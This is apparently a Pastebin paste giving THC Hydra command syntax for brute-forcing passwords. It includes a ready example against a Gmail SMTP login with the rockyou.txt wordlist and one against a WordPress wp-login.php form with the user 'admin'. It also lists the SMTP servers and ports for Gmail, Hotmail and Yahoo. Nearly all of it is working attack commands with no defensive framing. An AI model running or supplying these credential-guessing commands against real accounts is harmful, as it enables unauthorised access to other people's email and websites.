Advertisement
0xspade

THC Hydra Basic Syntax

Sep 6th, 2016
491
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.49 KB | None | 0 0
  1. THC HYDRA SYNTAX
  2.  
  3. hydra server smtp -l example@gmail.com -P wordlist -s port -S -v -V
  4.  
  5. example:hydra smtp.gmail.com smtp -l example@gmail.com -P /home/user/Desktop/rockyou.txt -s 465 -S -v -V
  6.  
  7. hydra -v http://site.com/ http-form-post "wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location" l admin -P password_path
  8.  
  9. Info about mail accounts
  10. gmail
  11. server: smtp.gmail.com
  12. port: 465
  13. hotmail
  14. server: smtp.live.com
  15. port: 587
  16. yahoo
  17. server: smtp.mail.yahoo.com
  18. port:587
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement